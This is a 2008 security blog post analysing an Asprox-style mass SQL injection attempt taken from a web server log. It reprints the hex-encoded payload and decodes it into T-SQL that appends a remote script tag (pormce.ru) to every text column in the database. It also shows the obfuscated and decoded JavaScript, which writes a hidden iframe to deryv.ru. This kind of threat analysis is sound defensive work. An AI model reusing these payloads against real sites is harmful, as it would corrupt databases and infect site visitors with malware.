Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday, 30 September 2008

Hex injection, they are persistent .......

If you've read this blog at all lately, you'll no doubt have read the previous blog entries I've made concerning this, and hillariously, they're still trying - evidently not realising their attempts aren't going to work.

The latest attempt comes from 201-92-227-227.dsl.telesp.net.br (IP: 201.92.227.227), and is in the same form as previously;

2008-09-30 20:08:16 GET /pest.asp show=8.15.231.;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E706F726D63652E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 201.92.227.227 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - 200 0 0


The part we're interested in, as before, is the Hex between CAST( and %20AS%20VARCHAR (%20 is the space character, so this translates to AS VARCHAR). This code translates this time to;

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.pormce.ru/script.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


This shows us they've got another URL, pormce.ru. If we run this through vURL we see;

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('s.r="";n=q.o.p();d((n!="4-t")&&(n!="4-u")&&(n!="z")&&(n!="y")&&(n!="x")&&(n!="v")&&(n!="m")&&(n!="A-f")&&(n!="g")&&(n!="4")&&(n!="h")&&(n!="i")&&(n!="l")){5 $a=2.8;5 $b=$a.j("7=");d($b!=-1){}k{5 $c=w V();$c.B($c.U()+3*Q*R);2.8="7=S;T="+$c.P();O{2.G("<9 F=E://C.D/6-H/I.6?N M=0 L=0 J=0></9>")}K(e){}}}',58,58,'||document||ZH|var|cgi|cvbest|cookie|iframe||||if||PH|UR|HI|TH|indexOf|else|VI|ID||userLanguage|toUpperCase|navigator|status|window|CN|MO|PA|new|NE|GU|BN|EN|setTime|deryv|ru|http|src|write|bin|index|frameborder|catch|height|width|script|try|toGMTString|3600|1000|update|expires|getTime|Date'.split('|'),0,{}))


Which is the usual obfuscation rubbish we're used to, and it's very easily decoded using Malzilla;

window.status="";n=navigator.userLanguage.toUpperCase();if((n!="ZH-CN")&&(n!=&undefined;ZH-MO")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!=&undefined;UR")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){var $a=document.cookie;var $b=$a.indexOf("cvbest=");if($b!=-1){}else{var $c=new Date();$c.setTime($c.getTime()+3*3600*1000);document.cookie="cvbest=update;expires="+$c.toGMTString();try{document.write("<iframe src=http://deryv.ru/cgi-bin/index.cgi?script width=0 height=0 frameborder=0></iframe>")}catch(e){}}}


This shows us another URL, this time pointing to deryv.ru. This script contains two more scripts that I've not decoded yet, but they're very similar to the previous Asprox injections.

No comments: